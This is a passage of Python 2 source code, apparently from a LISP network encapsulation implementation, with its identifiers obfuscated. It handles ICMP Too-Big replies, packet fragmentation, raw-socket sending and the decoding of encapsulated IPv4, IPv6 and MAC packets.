lprint ( "Rate limit sending ICMP Too-Big to {}" . format ( self . inner_source . print_address_no_iid ( ) ) )
if 87 - 87: OoO0O00
return ( False )
if 34 - 34: I1Ii111 . OoOoOO00 / i11iIiiIii / iII111i
if 46 - 46: Oo0Ooo + II111iiii * I1IiiI + OOooOOo
if 31 - 31: Ii1I * o0oOOo0O0Ooo * Ii1I + OoO0O00 * o0oOOo0O0Ooo . I1Ii111
if 89 - 89: OoooooooOO * Ii1I * I1IiiI . ooOoO0o * Ii1I / iII111i
if 46 - 46: i11iIiiIii
if 15 - 15: O0 / i1IIi / i1IIi . iII111i % OoOoOO00 + I1IiiI
if 48 - 48: I1Ii111 % iII111i % Ii1I % iIii1I11I1II1 . Ii1I
if 14 - 14: iII111i * OoO0O00 % O0 + I11i + I1ii11iIi11i
if 23 - 23: Oo0Ooo % iII111i + Ii1I - I1Ii111
if 65 - 65: OoooooooOO
if 22 - 22: OOooOOo + II111iiii + Oo0Ooo
if 83 - 83: ooOoO0o
if 43 - 43: OOooOOo
if 84 - 84: OOooOOo . IiII . iII111i
if 2 - 2: Oo0Ooo - OoOoOO00
I1iiII = socket . htons ( 1400 )
i111i1I1ii1i = struct . pack ( "BBHHH" , 3 , 4 , 0 , 0 , I1iiII )
i111i1I1ii1i += inner_packet [ 0 : 20 + 8 ]
i111i1I1ii1i = lisp_icmp_checksum ( i111i1I1ii1i )
if 81 - 81: OoOoOO00 + o0oOOo0O0Ooo + Oo0Ooo
if 79 - 79: Oo0Ooo - OoooooooOO % I1Ii111 + OoooooooOO - I11i % OoOoOO00
if 5 - 5: OoOoOO00 . Oo0Ooo
if 89 - 89: I1IiiI / iII111i / OoooooooOO - i11iIiiIii + I1IiiI
if 64 - 64: i11iIiiIii + i1IIi % O0 . I11i
if 64 - 64: ooOoO0o / i1IIi % iII111i
if 84 - 84: OoOoOO00 - Oo0Ooo . ooOoO0o . IiII - Oo0Ooo
o0Oo0oO00Oooo = inner_packet [ 12 : 16 ]
Ii1II1I11i1I = self . inner_source . print_address_no_iid ( )
OOoOo = self . outer_source . pack_address ( )
if 27 - 27: I1IiiI * i11iIiiIii / O0 / II111iiii
if 72 - 72: oO0o - Oo0Ooo / i11iIiiIii * I1IiiI + OoO0O00
if 47 - 47: OOooOOo / II111iiii % IiII . oO0o * I1ii11iIi11i
if 35 - 35: Oo0Ooo * II111iiii
if 32 - 32: oO0o . Oo0Ooo / ooOoO0o + ooOoO0o . I1ii11iIi11i
if 50 - 50: iIii1I11I1II1 * oO0o
if 85 - 85: i1IIi
if 100 - 100: OoooooooOO / I11i % OoO0O00 + Ii1I
i11111 = socket . htons ( 20 + 36 )
ooooo0Oo0 = struct . pack ( "BBHHHBBH" , 0x45 , 0 , i11111 , 0 , 0 , 32 , 1 , 0 ) + OOoOo + o0Oo0oO00Oooo
ooooo0Oo0 = lisp_ip_checksum ( ooooo0Oo0 )
ooooo0Oo0 = self . fix_outer_header ( ooooo0Oo0 )
ooooo0Oo0 += i111i1I1ii1i
IIi11 = bold ( "Too-Big" , False )
lprint ( "Send ICMP {} to {}, mtu 1400: {}" . format ( IIi11 , Ii1II1I11i1I ,
lisp_format_packet ( ooooo0Oo0 ) ) )
if 77 - 77: Oo0Ooo - IiII
try :
lisp_icmp_raw_socket . sendto ( ooooo0Oo0 , ( Ii1II1I11i1I , 0 ) )
except socket . error , iIIi1iI1I1IIi :
lprint ( "lisp_icmp_raw_socket.sendto() failed: {}" . format ( iIIi1iI1I1IIi ) )
return ( False )
if 50 - 50: OoO0O00 % OoooooooOO * II111iiii
if 54 - 54: OoooooooOO + Oo0Ooo * OOooOOo
if 98 - 98: oO0o - oO0o . ooOoO0o
if 60 - 60: I1IiiI * I1ii11iIi11i / O0 + I11i + IiII
if 66 - 66: IiII * Oo0Ooo . OoooooooOO * I1Ii111
if 93 - 93: IiII / i1IIi
lisp_last_icmp_too_big_sent = lisp_get_timestamp ( )
return ( True )
if 47 - 47: ooOoO0o - Ii1I
def fragment ( self ) :
global lisp_icmp_raw_socket
global lisp_ignore_df_bit
if 98 - 98: oO0o . I1Ii111 / OoOoOO00 . ooOoO0o
IiiiIi1iiii11 = self . fix_outer_header ( self . packet )
if 1 - 1: OOooOOo
if 87 - 87: O0 * II111iiii + iIii1I11I1II1 % oO0o % i11iIiiIii - OoOoOO00
if 73 - 73: iII111i + Ii1I
if 37 - 37: oO0o - iIii1I11I1II1 + II111iiii . Ii1I % iIii1I11I1II1
if 17 - 17: I1Ii111 + i1IIi % O0
if 65 - 65: IiII
oOOoO0O = len ( IiiiIi1iiii11 )
if ( oOOoO0O <= 1500 ) : return ( [ IiiiIi1iiii11 ] , "Fragment-None" )
if 50 - 50: II111iiii / OoO0O00
IiiiIi1iiii11 = self . packet
if 79 - 79: I1ii11iIi11i - iIii1I11I1II1 % i1IIi / Oo0Ooo + II111iiii
if 95 - 95: oO0o
if 48 - 48: I11i / iIii1I11I1II1 % II111iiii
if 39 - 39: i1IIi . I1ii11iIi11i / I11i / I11i
if 100 - 100: OoooooooOO - OoooooooOO + IiII
if ( self . inner_version != 4 ) :
iIiIi1i1Iiii = random . randint ( 0 , 0xffff )
OOO00000O = IiiiIi1iiii11 [ 0 : 4 ] + struct . pack ( "H" , iIiIi1i1Iiii ) + IiiiIi1iiii11 [ 6 : 20 ]
iIiiiII11 = IiiiIi1iiii11 [ 20 : : ]
OoiiI11111II = self . fragment_outer ( OOO00000O , iIiiiII11 )
return ( OoiiI11111II , "Fragment-Outer" )
if 98 - 98: I1ii11iIi11i
if 25 - 25: OOooOOo % OOooOOo
if 25 - 25: i11iIiiIii + I1ii11iIi11i - OoooooooOO . O0 % I1Ii111
if 53 - 53: i1IIi
if 59 - 59: o0oOOo0O0Ooo + I1IiiI % OoooooooOO - iIii1I11I1II1
iiIII1i1 = 56 if ( self . outer_version == 6 ) else 36
OOO00000O = IiiiIi1iiii11 [ 0 : iiIII1i1 ]
oOOo0OOoOO0 = IiiiIi1iiii11 [ iiIII1i1 : iiIII1i1 + 20 ]
iIiiiII11 = IiiiIi1iiii11 [ iiIII1i1 + 20 : : ]
if 30 - 30: II111iiii / I1IiiI - ooOoO0o + OoOoOO00 * ooOoO0o / OoOoOO00
if 17 - 17: OoO0O00
if 31 - 31: oO0o + OoooooooOO - Ii1I % o0oOOo0O0Ooo / o0oOOo0O0Ooo / iIii1I11I1II1
if 31 - 31: OoooooooOO - Ii1I . IiII % oO0o
if 16 - 16: OOooOOo * Ii1I % I1Ii111 / IiII + iIii1I11I1II1 / I1IiiI
IIII1I1 = struct . unpack ( "H" , oOOo0OOoOO0 [ 6 : 8 ] ) [ 0 ]
IIII1I1 = socket . ntohs ( IIII1I1 )
if ( IIII1I1 & 0x4000 ) :
if ( lisp_icmp_raw_socket != None ) :
I1i1i1iIi1iIi = IiiiIi1iiii11 [ iiIII1i1 : : ]
if ( self . send_icmp_too_big ( I1i1i1iIi1iIi ) ) : return ( [ ] , None )
if 22 - 22: iIii1I11I1II1 * I1IiiI / I11i + OoOoOO00
if ( lisp_ignore_df_bit ) :
IIII1I1 &= ~ 0x4000
else :
o00OoOOoO = bold ( "DF-bit set" , False )
dprint ( "{} in inner header, packet discarded" . format ( o00OoOOoO ) )
return ( [ ] , "Fragment-None-DF-bit" )
if 28 - 28: iIii1I11I1II1 * I11i . I1IiiI
if 78 - 78: OoooooooOO . OoooooooOO / O0
if 25 - 25: II111iiii % II111iiii - Ii1I . O0
oO0ooOoO = 0
oOOoO0O = len ( iIiiiII11 )
OoiiI11111II = [ ]
while ( oO0ooOoO < oOOoO0O ) :
OoiiI11111II . append ( iIiiiII11 [ oO0ooOoO : oO0ooOoO + 1400 ] )
oO0ooOoO += 1400
if 79 - 79: IiII / OoO0O00 * OoooooooOO * OoOoOO00 + I1IiiI
if 68 - 68: I11i / iIii1I11I1II1 . Oo0Ooo + i11iIiiIii + o0oOOo0O0Ooo
if 92 - 92: OoO0O00 . o0oOOo0O0Ooo . Ii1I % OoOoOO00
if 58 - 58: I1ii11iIi11i % Ii1I * Ii1I - iII111i
if 9 - 9: ooOoO0o - Ii1I % II111iiii + IiII + OOooOOo % O0
iI1i1Ii111I = OoiiI11111II
OoiiI11111II = [ ]
o00OoOo0 = True if IIII1I1 & 0x2000 else False
IIII1I1 = ( IIII1I1 & 0x1fff ) * 8
for o0o00OoOo0 in iI1i1Ii111I :
if 2 - 2: II111iiii + i1IIi
if 68 - 68: OOooOOo + Ii1I
if 58 - 58: IiII * Ii1I . i1IIi
if 19 - 19: oO0o
O0oooooO = IIII1I1 / 8
if ( o00OoOo0 ) :
O0oooooO |= 0x2000
elif ( o0o00OoOo0 != iI1i1Ii111I [ - 1 ] ) :
O0oooooO |= 0x2000
if 28 - 28: Oo0Ooo / IiII . iII111i + OoO0O00 + I11i % Oo0Ooo
O0oooooO = socket . htons ( O0oooooO )
oOOo0OOoOO0 = oOOo0OOoOO0 [ 0 : 6 ] + struct . pack ( "H" , O0oooooO ) + oOOo0OOoOO0 [ 8 : : ]
if 45 - 45: Oo0Ooo / O0 % OoooooooOO
if 92 - 92: Ii1I . OoOoOO00 . I11i - OoooooooOO / ooOoO0o
if 80 - 80: iIii1I11I1II1 / i11iIiiIii + iII111i
if 41 - 41: I1Ii111 + OoO0O00 * I1IiiI * O0 * Oo0Ooo - OoOoOO00
if 96 - 96: I1IiiI - iIii1I11I1II1
if 25 - 25: OoooooooOO . Ii1I % iII111i . IiII
oOOoO0O = len ( o0o00OoOo0 )
IIII1I1 += oOOoO0O
IIi1I1 = socket . htons ( oOOoO0O + 20 )
oOOo0OOoOO0 = oOOo0OOoOO0 [ 0 : 2 ] + struct . pack ( "H" , IIi1I1 ) + oOOo0OOoOO0 [ 4 : 10 ] + struct . pack ( "H" , 0 ) + oOOo0OOoOO0 [ 12 : : ]
if 67 - 67: OoooooooOO + I1Ii111 / ooOoO0o
oOOo0OOoOO0 = lisp_ip_checksum ( oOOo0OOoOO0 )
O0oo = oOOo0OOoOO0 + o0o00OoOo0
if 50 - 50: I1Ii111 - II111iiii
if 33 - 33: IiII / IiII . i11iIiiIii * I1ii11iIi11i + o0oOOo0O0Ooo
if 16 - 16: IiII
if 10 - 10: OoOoOO00 . IiII * iIii1I11I1II1 - oO0o - OoOoOO00 / I1Ii111
if 13 - 13: oO0o + OoOoOO00 % IiII % OoooooooOO
oOOoO0O = len ( O0oo )
if ( self . outer_version == 4 ) :
IIi1I1 = oOOoO0O + iiIII1i1
oOOoO0O += 16
OOO00000O = OOO00000O [ 0 : 2 ] + struct . pack ( "H" , IIi1I1 ) + OOO00000O [ 4 : : ]
if 22 - 22: I1Ii111
OOO00000O = lisp_ip_checksum ( OOO00000O )
O0oo = OOO00000O + O0oo
O0oo = self . fix_outer_header ( O0oo )
if 23 - 23: O0
if 41 - 41: i1IIi . OOooOOo / ooOoO0o / o0oOOo0O0Ooo % IiII - Ii1I
if 14 - 14: I1ii11iIi11i - i11iIiiIii * I1Ii111
if 39 - 39: OoooooooOO
if 19 - 19: i11iIiiIii
oOOOO = iiIII1i1 - 12
IIi1I1 = socket . htons ( oOOoO0O )
O0oo = O0oo [ 0 : oOOOO ] + struct . pack ( "H" , IIi1I1 ) + O0oo [ oOOOO + 2 : : ]
if 82 - 82: i1IIi + o0oOOo0O0Ooo - II111iiii . Ii1I
OoiiI11111II . append ( O0oo )
if 93 - 93: II111iiii * OoOoOO00 % o0oOOo0O0Ooo
return ( OoiiI11111II , "Fragment-Inner" )
if 67 - 67: o0oOOo0O0Ooo + Oo0Ooo . ooOoO0o - i1IIi . OoOoOO00
if 12 - 12: IiII / OoO0O00 / O0 * IiII
def fix_outer_header ( self , packet ) :
if 51 - 51: ooOoO0o * iII111i / i1IIi
if 2 - 2: oO0o + IiII . iII111i - i1IIi + I1Ii111
if 54 - 54: OoooooooOO . oO0o - iII111i
if 76 - 76: I1Ii111
if 61 - 61: ooOoO0o / II111iiii * ooOoO0o * OoOoOO00 * I1Ii111 . i11iIiiIii
if 26 - 26: I1Ii111 / ooOoO0o - OoO0O00 . iIii1I11I1II1
if 83 - 83: ooOoO0o % Ii1I / Oo0Ooo - iII111i / O0
if 97 - 97: iIii1I11I1II1 * I11i
if ( self . outer_version == 4 or self . inner_version == 4 ) :
if ( lisp_is_macos ( ) ) :
packet = packet [ 0 : 2 ] + packet [ 3 ] + packet [ 2 ] + packet [ 4 : 6 ] + packet [ 7 ] + packet [ 6 ] + packet [ 8 : : ]
if 95 - 95: OoO0O00
else :
packet = packet [ 0 : 2 ] + packet [ 3 ] + packet [ 2 ] + packet [ 4 : : ]
if 68 - 68: iIii1I11I1II1 . iIii1I11I1II1 / OoOoOO00 - II111iiii - iIii1I11I1II1
if 75 - 75: ooOoO0o . I1IiiI * II111iiii
return ( packet )
if 99 - 99: iIii1I11I1II1 * I1ii11iIi11i + IiII
if 70 - 70: i1IIi % ooOoO0o . I1ii11iIi11i - IiII + OOooOOo
def send_packet ( self , lisp_raw_socket , dest ) :
if ( lisp_flow_logging and dest != self . inner_dest ) : self . log_flow ( True )
if 84 - 84: oO0o + II111iiii * II111iiii % o0oOOo0O0Ooo / iII111i + ooOoO0o
dest = dest . print_address_no_iid ( )
OoiiI11111II , iiIIIi11I1I = self . fragment ( )
if 52 - 52: oO0o + Ii1I - I1ii11iIi11i * Ii1I . OOooOOo + I1Ii111
for O0oo in OoiiI11111II :
if ( len ( OoiiI11111II ) != 1 ) :
self . packet = O0oo
self . print_packet ( iiIIIi11I1I , True )
if 43 - 43: I1IiiI % IiII % I1ii11iIi11i
if 53 - 53: oO0o % OOooOOo % I1ii11iIi11i . I1Ii111 . I1Ii111 . iII111i
try : lisp_raw_socket . sendto ( O0oo , ( dest , 0 ) )
except socket . error , iIIi1iI1I1IIi :
lprint ( "socket.sendto() failed: {}" . format ( iIIi1iI1I1IIi ) )
if 73 - 73: iII111i / ooOoO0o + OoO0O00 / OoOoOO00 . II111iiii * Ii1I
if 21 - 21: I1IiiI - I1IiiI + iII111i % I1IiiI * oO0o
if 74 - 74: iII111i / I11i . I1IiiI - OoooooooOO + II111iiii + I11i
if 36 - 36: Ii1I * I1IiiI * I1ii11iIi11i . I11i * I1ii11iIi11i
def send_l2_packet ( self , l2_socket , mac_header ) :
if ( l2_socket == None ) :
lprint ( "No layer-2 socket, drop IPv6 packet" )
return
if 76 - 76: OOooOOo + O0 / IiII - OoO0O00
if ( mac_header == None ) :
lprint ( "Could not build MAC header, drop IPv6 packet" )
return
if 27 - 27: Oo0Ooo - iIii1I11I1II1 * iII111i * II111iiii * I1ii11iIi11i
if 9 - 9: i11iIiiIii + OOooOOo - OoOoOO00 / ooOoO0o % i1IIi / oO0o
IiiiIi1iiii11 = mac_header + self . packet
if 22 - 22: i1IIi
if 3 - 3: OoO0O00 * I1ii11iIi11i - iII111i + I1ii11iIi11i
if 63 - 63: I11i * ooOoO0o % II111iiii % I1Ii111 + I1IiiI * Oo0Ooo
if 96 - 96: IiII
if 99 - 99: iIii1I11I1II1 - ooOoO0o
if 79 - 79: I1IiiI + oO0o % I11i % oO0o
if 56 - 56: I1ii11iIi11i + oO0o . OoO0O00 + OoooooooOO * I1ii11iIi11i - O0
if 35 - 35: OOooOOo . I11i . I1Ii111 - I11i % I11i + I1Ii111
if 99 - 99: o0oOOo0O0Ooo + OOooOOo
if 34 - 34: I1Ii111 * o0oOOo0O0Ooo . I1IiiI % i11iIiiIii
if 61 - 61: iIii1I11I1II1 + oO0o * I11i - i1IIi % oO0o
l2_socket . write ( IiiiIi1iiii11 )
return
if 76 - 76: oO0o / OoOoOO00
if 12 - 12: I1Ii111
def bridge_l2_packet ( self , eid , db ) :
try : OO0oOo = db . dynamic_eids [ eid . print_address_no_iid ( ) ]
except : return
try : II1i = lisp_myinterfaces [ OO0oOo . interface ]
except : return
try :
socket = II1i . get_bridge_socket ( )
if ( socket == None ) : return
except : return
if 36 - 36: OoOoOO00 * OoO0O00 / ooOoO0o / I1IiiI - Ii1I
try : socket . send ( self . packet )
except socket . error , iIIi1iI1I1IIi :
lprint ( "bridge_l2_packet(): socket.send() failed: {}" . format ( iIIi1iI1I1IIi ) )
if 53 - 53: oO0o
if 99 - 99: Oo0Ooo
if 17 - 17: i11iIiiIii - i11iIiiIii + I1ii11iIi11i * ooOoO0o * oO0o / OoooooooOO
def is_lisp_packet ( self , packet ) :
oOoO0OOO00O = ( struct . unpack ( "B" , packet [ 9 ] ) [ 0 ] == LISP_UDP_PROTOCOL )
if ( oOoO0OOO00O == False ) : return ( False )
if 22 - 22: I1Ii111 * I1ii11iIi11i - IiII
Oo0o = struct . unpack ( "H" , packet [ 22 : 24 ] ) [ 0 ]
if ( socket . ntohs ( Oo0o ) == LISP_DATA_PORT ) : return ( True )
Oo0o = struct . unpack ( "H" , packet [ 20 : 22 ] ) [ 0 ]
if ( socket . ntohs ( Oo0o ) == LISP_DATA_PORT ) : return ( True )
return ( False )
if 4 - 4: I1Ii111 * I1IiiI % I1IiiI / OoooooooOO
if 52 - 52: oO0o + I1Ii111 * I1Ii111 * Oo0Ooo - iIii1I11I1II1 + I1ii11iIi11i
def decode ( self , is_lisp_packet , lisp_ipc_socket , stats ) :
self . packet_error = ""
IiiiIi1iiii11 = self . packet
i1iI = len ( IiiiIi1iiii11 )
I1111iIIiIIII = oOo0O = True
if 44 - 44: i11iIiiIii
if 11 - 11: I1IiiI - Ii1I * OOooOOo % o0oOOo0O0Ooo
if 5 - 5: I1ii11iIi11i / o0oOOo0O0Ooo * I11i - i11iIiiIii - OoooooooOO / ooOoO0o
if 6 - 6: I11i * OoooooooOO - OOooOOo + O0 * I1Ii111
OoI1 = 0
IiIIi11i111 = 0
if ( is_lisp_packet ) :
IiIIi11i111 = self . lisp_header . get_instance_id ( )
Iii11111I1iii = struct . unpack ( "B" , IiiiIi1iiii11 [ 0 : 1 ] ) [ 0 ]
self . outer_version = Iii11111I1iii >> 4
if ( self . outer_version == 4 ) :
if 67 - 67: I1ii11iIi11i + oO0o * IiII / II111iiii % OoO0O00 % OoO0O00
if 28 - 28: OoOoOO00 % oO0o - OOooOOo + OOooOOo + oO0o / iIii1I11I1II1
if 91 - 91: I1IiiI / II111iiii * OOooOOo
if 94 - 94: II111iiii - iIii1I11I1II1 - iIii1I11I1II1
if 83 - 83: I1ii11iIi11i * iIii1I11I1II1 + OoOoOO00 * i1IIi . OoooooooOO % Ii1I
oOoOo00oo = struct . unpack ( "H" , IiiiIi1iiii11 [ 10 : 12 ] ) [ 0 ]
IiiiIi1iiii11 = lisp_ip_checksum ( IiiiIi1iiii11 )
oO0oOoo0O = struct . unpack ( "H" , IiiiIi1iiii11 [ 10 : 12 ] ) [ 0 ]
if ( oO0oOoo0O != 0 ) :
if ( oOoOo00oo != 0 or lisp_is_macos ( ) == False ) :
self . packet_error = "checksum-error"
if ( stats ) :
stats [ self . packet_error ] . increment ( i1iI )
if 32 - 32: I1IiiI * I1Ii111 * i1IIi + oO0o
if 40 - 40: II111iiii
lprint ( "IPv4 header checksum failed for outer header" )
if ( lisp_flow_logging ) : self . log_flow ( False )
return ( None )
if 7 - 7: OOooOOo / OoO0O00
if 88 - 88: i1IIi
if 53 - 53: ooOoO0o . OOooOOo . o0oOOo0O0Ooo + oO0o
IiiiII = LISP_AFI_IPV4
oO0ooOoO = 12
self . outer_tos = struct . unpack ( "B" , IiiiIi1iiii11 [ 1 : 2 ] ) [ 0 ]
self . outer_ttl = struct . unpack ( "B" , IiiiIi1iiii11 [ 8 : 9 ] ) [ 0 ]
OoI1 = 20
elif ( self . outer_version == 6 ) :
IiiiII = LISP_AFI_IPV6
oO0ooOoO = 8
OoO = struct . unpack ( "H" , IiiiIi1iiii11 [ 0 : 2 ] ) [ 0 ]
self . outer_tos = ( socket . ntohs ( OoO ) >> 4 ) & 0xff
self . outer_ttl = struct . unpack ( "B" , IiiiIi1iiii11 [ 7 : 8 ] ) [ 0 ]
OoI1 = 40
else :
self . packet_error = "outer-header-error"
if ( stats ) : stats [ self . packet_error ] . increment ( i1iI )
lprint ( "Cannot decode outer header" )
return ( None )
if 57 - 57: oO0o
if 92 - 92: II111iiii - OoO0O00 - OOooOOo % I1IiiI - OoOoOO00 * I1Ii111
self . outer_source . afi = IiiiII
self . outer_dest . afi = IiiiII
IiIi11 = self . outer_source . addr_length ( )
if 89 - 89: iII111i . OoOoOO00 . I11i
self . outer_source . unpack_address ( IiiiIi1iiii11 [ oO0ooOoO : oO0ooOoO + IiIi11 ] )
oO0ooOoO += IiIi11
self . outer_dest . unpack_address ( IiiiIi1iiii11 [ oO0ooOoO : oO0ooOoO + IiIi11 ] )
IiiiIi1iiii11 = IiiiIi1iiii11 [ OoI1 : : ]
self . outer_source . mask_len = self . outer_source . host_mask_len ( )
self . outer_dest . mask_len = self . outer_dest . host_mask_len ( )
if 55 - 55: iII111i + Oo0Ooo
if 95 - 95: I11i + Oo0Ooo + Oo0Ooo
if 33 - 33: i1IIi % OoooooooOO / OoooooooOO
if 88 - 88: I1Ii111 - Ii1I - oO0o + i1IIi
ii11IiiIi = struct . unpack ( "H" , IiiiIi1iiii11 [ 0 : 2 ] ) [ 0 ]
self . udp_sport = socket . ntohs ( ii11IiiIi )
ii11IiiIi = struct . unpack ( "H" , IiiiIi1iiii11 [ 2 : 4 ] ) [ 0 ]
self . udp_dport = socket . ntohs ( ii11IiiIi )
ii11IiiIi = struct . unpack ( "H" , IiiiIi1iiii11 [ 4 : 6 ] ) [ 0 ]
self . udp_length = socket . ntohs ( ii11IiiIi )
ii11IiiIi = struct . unpack ( "H" , IiiiIi1iiii11 [ 6 : 8 ] ) [ 0 ]
self . udp_checksum = socket . ntohs ( ii11IiiIi )
IiiiIi1iiii11 = IiiiIi1iiii11 [ 8 : : ]
if 39 - 39: OoO0O00 / Oo0Ooo % II111iiii % I11i
if 57 - 57: OoO0O00
if 79 - 79: OoOoOO00 + IiII
if 14 - 14: I1Ii111 / I11i - OOooOOo * O0 % IiII . O0
I1111iIIiIIII = ( self . udp_dport == LISP_DATA_PORT or
self . udp_sport == LISP_DATA_PORT )
oOo0O = ( self . udp_dport in ( LISP_L2_DATA_PORT , LISP_VXLAN_DATA_PORT ) )
if 86 - 86: i1IIi * OoooooooOO
if 22 - 22: I1Ii111 + iII111i - I11i + iIii1I11I1II1 / I1Ii111 - OoooooooOO
if 42 - 42: OoooooooOO - OoOoOO00 - OOooOOo * I1Ii111
if 98 - 98: OoO0O00 . iIii1I11I1II1 % Oo0Ooo + OoooooooOO
if ( self . lisp_header . decode ( IiiiIi1iiii11 ) == False ) :
self . packet_error = "lisp-header-error"
if ( stats ) : stats [ self . packet_error ] . increment ( i1iI )
if 2 - 2: I1Ii111 % OoooooooOO - ooOoO0o * I1ii11iIi11i * IiII
if ( lisp_flow_logging ) : self . log_flow ( False )
lprint ( "Cannot decode LISP header" )
return ( None )
if 99 - 99: iIii1I11I1II1 . Oo0Ooo / ooOoO0o . OOooOOo % I1IiiI * I11i
IiiiIi1iiii11 = IiiiIi1iiii11 [ 8 : : ]
IiIIi11i111 = self . lisp_header . get_instance_id ( )
OoI1 += 16
if 95 - 95: oO0o
if ( IiIIi11i111 == 0xffffff ) : IiIIi11i111 = 0
if 80 - 80: IiII
if 42 - 42: OoooooooOO * II111iiii
if 53 - 53: I1Ii111 + i1IIi . OoO0O00 / i11iIiiIii + Ii1I % OoOoOO00
if 9 - 9: ooOoO0o . I11i - Oo0Ooo . I1Ii111
i1I111II11 = False
o00oO = self . lisp_header . k_bits
if ( o00oO ) :
oo0o00OO = lisp_get_crypto_decap_lookup_key ( self . outer_source ,
self . udp_sport )
if ( oo0o00OO == None ) :
self . packet_error = "no-decrypt-key"
if ( stats ) : stats [ self . packet_error ] . increment ( i1iI )
if 32 - 32: iII111i . iIii1I11I1II1 % Oo0Ooo . OoooooooOO
self . print_packet ( "Receive" , is_lisp_packet )
Ooo00OoO0O00 = bold ( "No key available" , False )
dprint ( "{} for key-id {} to decrypt packet" . format ( Ooo00OoO0O00 , o00oO ) )
if ( lisp_flow_logging ) : self . log_flow ( False )
return ( None )
if 11 - 11: I11i
if 20 - 20: O0 . i11iIiiIii * i1IIi % O0 . I1IiiI
o0Oo = lisp_crypto_keys_by_rloc_decap [ oo0o00OO ] [ o00oO ]
if ( o0Oo == None ) :
self . packet_error = "no-decrypt-key"
if ( stats ) : stats [ self . packet_error ] . increment ( i1iI )
if 29 - 29: O0 * i11iIiiIii / OoooooooOO / o0oOOo0O0Ooo . ooOoO0o
self . print_packet ( "Receive" , is_lisp_packet )
Ooo00OoO0O00 = bold ( "No key available" , False )
dprint ( "{} to decrypt packet from RLOC {}" . format ( Ooo00OoO0O00 ,
red ( oo0o00OO , False ) ) )
if ( lisp_flow_logging ) : self . log_flow ( False )
return ( None )
if 70 - 70: OoooooooOO . ooOoO0o / oO0o . oO0o - o0oOOo0O0Ooo
if 29 - 29: I11i % OOooOOo - ooOoO0o
if 26 - 26: O0 . I11i + iII111i - Ii1I . I11i
if 2 - 2: I1ii11iIi11i . Oo0Ooo * OOooOOo % II111iiii . iII111i
if 46 - 46: OoOoOO00 + I1IiiI % OoooooooOO * i11iIiiIii - Oo0Ooo
o0Oo . use_count += 1
IiiiIi1iiii11 , i1I111II11 = self . decrypt ( IiiiIi1iiii11 , OoI1 , o0Oo ,
oo0o00OO )
if ( i1I111II11 == False ) :
if ( stats ) : stats [ self . packet_error ] . increment ( i1iI )
if ( lisp_flow_logging ) : self . log_flow ( False )
return ( None )
if 47 - 47: iII111i * OoOoOO00 * IiII
if 46 - 46: Ii1I
if 42 - 42: iIii1I11I1II1
if 32 - 32: Oo0Ooo - Ii1I . OoooooooOO - OoooooooOO - Oo0Ooo . iIii1I11I1II1
if 34 - 34: Oo0Ooo
if 31 - 31: i1IIi - I11i + I1Ii111 + ooOoO0o . ooOoO0o . O0
Iii11111I1iii = struct . unpack ( "B" , IiiiIi1iiii11 [ 0 : 1 ] ) [ 0 ]
self . inner_version = Iii11111I1iii >> 4
if ( I1111iIIiIIII and self . inner_version == 4 and Iii11111I1iii >= 0x45 ) :
ii11I = socket . ntohs ( struct . unpack ( "H" , IiiiIi1iiii11 [ 2 : 4 ] ) [ 0 ] )
self . inner_tos = struct . unpack ( "B" , IiiiIi1iiii11 [ 1 : 2 ] ) [ 0 ]
self . inner_ttl = struct . unpack ( "B" , IiiiIi1iiii11 [ 8 : 9 ] ) [ 0 ]
self . inner_protocol = struct . unpack ( "B" , IiiiIi1iiii11 [ 9 : 10 ] ) [ 0 ]
self . inner_source . afi = LISP_AFI_IPV4
self . inner_dest . afi = LISP_AFI_IPV4
self . inner_source . unpack_address ( IiiiIi1iiii11 [ 12 : 16 ] )
self . inner_dest . unpack_address ( IiiiIi1iiii11 [ 16 : 20 ] )
IIII1I1 = socket . ntohs ( struct . unpack ( "H" , IiiiIi1iiii11 [ 6 : 8 ] ) [ 0 ] )
self . inner_is_fragment = ( IIII1I1 & 0x2000 or IIII1I1 != 0 )
if ( self . inner_protocol == LISP_UDP_PROTOCOL ) :
self . inner_sport = struct . unpack ( "H" , IiiiIi1iiii11 [ 20 : 22 ] ) [ 0 ]
self . inner_sport = socket . ntohs ( self . inner_sport )
self . inner_dport = struct . unpack ( "H" , IiiiIi1iiii11 [ 22 : 24 ] ) [ 0 ]
self . inner_dport = socket . ntohs ( self . inner_dport )
if 2 - 2: oO0o . OOooOOo
elif ( I1111iIIiIIII and self . inner_version == 6 and Iii11111I1iii >= 0x60 ) :
ii11I = socket . ntohs ( struct . unpack ( "H" , IiiiIi1iiii11 [ 4 : 6 ] ) [ 0 ] ) + 40
OoO = struct . unpack ( "H" , IiiiIi1iiii11 [ 0 : 2 ] ) [ 0 ]
self . inner_tos = ( socket . ntohs ( OoO ) >> 4 ) & 0xff
self . inner_ttl = struct . unpack ( "B" , IiiiIi1iiii11 [ 7 : 8 ] ) [ 0 ]
self . inner_protocol = struct . unpack ( "B" , IiiiIi1iiii11 [ 6 : 7 ] ) [ 0 ]
self . inner_source . afi = LISP_AFI_IPV6
self . inner_dest . afi = LISP_AFI_IPV6
self . inner_source . unpack_address ( IiiiIi1iiii11 [ 8 : 24 ] )
self . inner_dest . unpack_address ( IiiiIi1iiii11 [ 24 : 40 ] )
if ( self . inner_protocol == LISP_UDP_PROTOCOL ) :
self . inner_sport = struct . unpack ( "H" , IiiiIi1iiii11 [ 40 : 42 ] ) [ 0 ]
self . inner_sport = socket . ntohs ( self . inner_sport )
self . inner_dport = struct . unpack ( "H" , IiiiIi1iiii11 [ 42 : 44 ] ) [ 0 ]
self . inner_dport = socket . ntohs ( self . inner_dport )
if 43 - 43: iIii1I11I1II1
elif ( oOo0O ) :
ii11I = len ( IiiiIi1iiii11 )
self . inner_tos = 0
self . inner_ttl = 0
self . inner_protocol = 0
self . inner_source . afi = LISP_AFI_MAC
self . inner_dest . afi = LISP_AFI_MAC
self . inner_dest . unpack_address ( self . swap_mac ( IiiiIi1iiii11 [ 0 : 6 ] ) )
self . inner_source . unpack_address ( self . swap_mac ( IiiiIi1iiii11 [ 6 : 12 ] ) )
elif ( self . lisp_header . get_instance_id ( ) == 0xffffff ) :
if ( lisp_flow_logging ) : self . log_flow ( False )
return ( self )
else :
self . packet_error = "bad-inner-version"
if ( stats ) : stats [ self . packet_error ] . increment ( i1iI )
if 29 - 29: IiII % ooOoO0o + OoO0O00 . i1IIi + I1IiiI
lprint ( "Cannot decode encapsulation, header version {}" . format ( hex ( Iii11111I1iii ) ) )
if 24 - 24: I1Ii111 / Ii1I * I1ii11iIi11i - OoooooooOO / I1IiiI . oO0o
IiiiIi1iiii11 = lisp_format_packet ( IiiiIi1iiii11 [ 0 : 20 ] )
